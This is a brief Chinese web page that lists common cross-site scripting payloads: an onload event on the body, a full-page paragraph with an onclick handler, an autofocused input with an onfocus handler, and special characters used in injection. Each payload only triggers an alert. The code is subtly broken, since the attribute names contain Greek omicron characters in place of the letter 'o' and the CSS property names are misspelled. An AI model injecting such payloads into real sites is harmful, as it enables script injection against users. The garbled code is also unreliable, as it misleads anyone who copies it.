xss常見攻擊代碼有:
1.加載完畢自動觸發事件:
<body οnlοad="alert('xss')"></body>
2.使html某元素撐滿整個頁面:
<p οnclick="alert('1')" style="postion:fixed;width:100%;heith:100%"> </p>
3.增加屬性觸發事件:
<input οnfοcus="alert('1')" autofocus/>
4.特殊字符' 、" 、( 、)等等。
億速云公眾號
手機網站二維碼
Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有
廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529